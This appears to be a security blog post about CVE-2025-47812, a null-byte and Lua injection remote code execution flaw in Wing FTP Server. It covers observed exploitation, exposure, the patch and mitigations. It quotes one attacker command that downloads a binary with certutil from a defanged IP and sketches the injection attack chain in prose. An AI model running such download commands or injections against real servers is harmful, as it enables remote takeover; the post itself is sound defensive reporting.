Critical Wing FTP Server Vulnerability (CVE-2025-47812) Actively Being Exploited in the Wild

on

 

Critical Wing FTP Server Vulnerability (CVE‑2025‑47812) Actively Being Exploited in the Wild

In mid‑2025, security researchers sounded an urgent alarm about a critical remote code execution (RCE) vulnerability in Wing FTP Server — tracked as CVE‑2025‑47812 — that is already being actively exploited by malicious actors in real‑world attacks. With a maximum severity score and the ability to allow unauthenticated, root‑level command execution, this flaw represents one of the most dangerous vulnerabilities discovered so far in 2025 and demands immediate action from organizations still running affected versions. NVD

What Is Wing FTP Server and Why It Matters

Wing FTP Server is a versatile file transfer server widely used across industries to provide secure file sharing capabilities over FTP, FTPS, SFTP, and HTTP/S protocols. Its flexibility and cross‑platform support (Windows, Linux, macOS) make it popular in corporate environments, critical infrastructure, data centers, and even government agencies. SOCRadar® Cyber Intelligence Inc.

Because FTP and related services are often used to move sensitive files — including backups, invoices, proprietary data, and administrative scripts — any flaw that allows attackers to compromise such a server can have severe business, operational, and regulatory consequences. Fidelis Security

What Makes CVE‑2025‑47812 So Dangerous

Technical Root Cause: Null‑Byte and Lua Injection

The vulnerability stems from improper handling of null (\0) bytes in the authentication logic of Wing FTP Server’s web interface, specifically within endpoints such as /loginok.html. This flaw allows attackers to craft malicious requests that include null bytes in the username parameter, misleading the server’s string‑handling code. Once a null byte prematurely terminates a string, it opens the door for Lua code injection into user session files. NVD

Lua scripting is embedded within Wing FTP’s session processing logic. When unauthorized Lua code is injected into files that the server later reads and executes as part of normal operation, the injected code runs with the same high privileges as the Wing FTP Server process itself — which is typically root on Linux systems or SYSTEM on Windows machines. NVD

This combination of null‑byte injection and script execution creates an RCE pathway with no authentication required, enabling:

  • Command execution on compromised hosts

  • Deployment of malware

  • Creation of persistent backdoor accounts

  • Full server takeover and lateral movement into networks The Hacker News

The flaw is so serious that its CVSS v3.1 score is a critical 10.0, reflecting maximum impact to confidentiality, integrity, and availability. OpenCVE

Active Exploitation: Attacks Started Fast

Once details of the flaw were publicly disclosed on June 30, 2025, attackers wasted little time. Researchers from Huntress observed actual exploitation attempts as early as July 1, 2025just one day later. These early attacks demonstrated how swiftly threat actors can weaponize publicly released vulnerability details and proof‑of‑concept code against exposed servers. Huntress

In the observed incident, attackers:

  • Connected to the vulnerable Wing FTP Server process (WFTPServer.exe)

  • Attempted reconnaissance on the victim host

  • Created new user accounts for persistence

  • Tried to download and run malicious binaries using certutil — a legitimate Windows tool commonly abused by attackers to download files from the internet (e.g., certutil -urlcache -f http://185.196.9[.]225:8080/... %TEMP%\<file.exe>). Huntress

Thanks to proactive endpoint protection (Microsoft Defender), the downloaded payload was blocked before execution, and the attack terminated when the server process crashed. Nonetheless, this early real‑world exploitation confirmed that threat actors were already targeting vulnerable installations soon after disclosure. Huntress

How Many Servers Are at Risk?

According to internet scanning and threat intelligence data, there were approximately 8,100 publicly accessible devices running Wing FTP Server, of which around 5,000 had their web management interfaces exposed to the Internet — the exact endpoint that the vulnerability targets. Censys

These exposed interfaces are prime targets for exploit traffic because they accept HTTP/S requests that can be manipulated to carry the malicious null‑byte payloads necessary for the exploit. Censys

The geographic distribution of vulnerable servers spanned multiple regions, including the United States, China, Germany, the United Kingdom, and India — underscoring that this is not a localized issue but a global threat. The Hacker News

Why the Vulnerability Is So Easy to Attack

Several factors contributed to both the severity and the rapid exploitation of CVE‑2025‑47812:

1. No Authentication Required

Because the bug can be triggered without any credential requirement — even through anonymous FTP access in some configurations — attackers don’t need to first compromise user accounts or guess passwords. NVD

2. Publicly Available Exploit Code

Proof‑of‑concept exploits were released online shortly after publication, meaning attackers can easily adapt them to target vulnerable hosts. Open exploit code significantly lowers the barrier for exploitation by novice and intermediate attackers. Canadian Centre for Cyber Security

3. Deep Privilege Execution

Once exploited, the attacker essentially gains the same rights as the server process — often full administrative control — giving them the ability to run any system‑level commands, deploy shells, or install persistent malware. OpenCVE

4. High Exposure Count

Thousands of internet‑facing servers were still running older software versions because administrators had not applied the vendor patch, creating a large pool of easy targets for attackers to probe and compromise. Censys

Vendor and Government Responses

Wing FTP Server’s vendor released a security update — version 7.4.4 on May 14, 2025 — that fixes CVE‑2025‑47812 and related flaws. Administrators are urged to upgrade immediately to this or later versions to mitigate the risk. Canadian Centre for Cyber Security

The vulnerability was also added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) Catalog, meaning federal and critical infrastructure entities are required to address it under applicable directives by early August 2025. CVEFeed

Government cyber centers, including Canada’s Cyber Centre and NHS England’s National CSOC, have issued alerts confirming active exploitation and calling for urgent remediation among their constituencies. Canadian Centre for Cyber Security+1

Example Attack Chain (Simplified)

To understand how the vulnerability works in practice:

  1. Initial Probe: An attacker scans for Wing FTP Server web interfaces exposed on the internet.

  2. Payload Delivery: The attacker sends a crafted HTTP POST request to the vulnerable “/loginok.html” endpoint containing a null byte (%00) and Lua injection code.

  3. Session File Corruption: The server mishandles the null byte, causing the injected Lua to be written into session files.

  4. Execution Trigger: When the server reads those session files — as part of its normal session handling — the malicious Lua runs.

  5. Command Execution: The injected script executes arbitrary system commands with root/SYSTEM privileges.

  6. Post‑Exploit Activity: Once foothold is achieved, attackers may create accounts, deploy backdoors, or stage further malware. Censys

Real‑World Impacts of Exploitation

Even in the early observed exploitation, attackers attempted:

  • Enumeration and reconnaissance of the compromised host.

  • Creation of new user accounts to sustain persistence.

  • Deployment of Remote Monitoring and Management (RMM) tools (like ScreenConnect). Help Net Security

While defenders intercepted these actions in the observed case, the potential consequences on unprotected systems are far more severe:

  • Full server compromise with root/system privileges.

  • Data theft from sensitive file exchanges.

  • Deployment of ransomware or other malware.

  • Lateral movement into internal networks. Help Net Security

Urgent Mitigation and Best Practices

Given the severity and active exploitation, organizations should take these steps immediately:

1. Patch Immediately

Upgrade all Wing FTP Server installations to version 7.4.4 or later. This fixes the vulnerability and should be prioritized for known or suspected internet‑facing instances. Canadian Centre for Cyber Security

2. Restrict Administrative Interfaces

If patching cannot be done immediately, restrict access to the web admin interface using firewalls, VPNs, or access control lists to block public access. Kodem Security

3. Disable Anonymous FTP Logins

While not a complete mitigation, disabling anonymous access reduces the attack surface, since the flaw is exploitable via those accounts in some configurations. Kodem Security

4. Monitor Logs for Suspicious Activity

Check logs for signs of malformed username parameters, unusual session file modifications, or unexpected Lua files, which can be indicators of exploitation attempts. Kodem Security

5. Rotate Credentials

After patching, reset credentials tied to affected servers to prevent unauthorized access using compromised backdoor accounts. Kodem Security

6. Comprehensive Inventory

Organizations should audit their software inventory and software bill of materials (SBOMs) to identify all instances of Wing FTP Server before 7.4.4 and prioritize updates. Kodem Security

Conclusion: A Critical Risk with Active Threats

CVE‑2025‑47812 — a critical null‑byte and Lua injection flaw in Wing FTP Server — represents a catastrophic risk to unpatched systems, enabling unauthenticated attackers to execute arbitrary code at the highest possible privilege level. The fact that exploitation began within 24 hours of public disclosure underscores how quickly attackers move to weaponize vulnerabilities, especially when proof‑of‑concept code is available. Huntress

With thousands of exposed servers worldwide, organizations using Wing FTP Server must act immediately to patch, restrict access, and monitor systems to prevent severe compromises that could lead to data loss, ransomware deployment, or broader network breaches. The global threat landscape continues to evolve rapidly, and this vulnerability is a stark reminder that zero‑day or newly disclosed critical bugs can — and will — be exploited in the wild rapidly and at scale. Censys

Comments

Post a Comment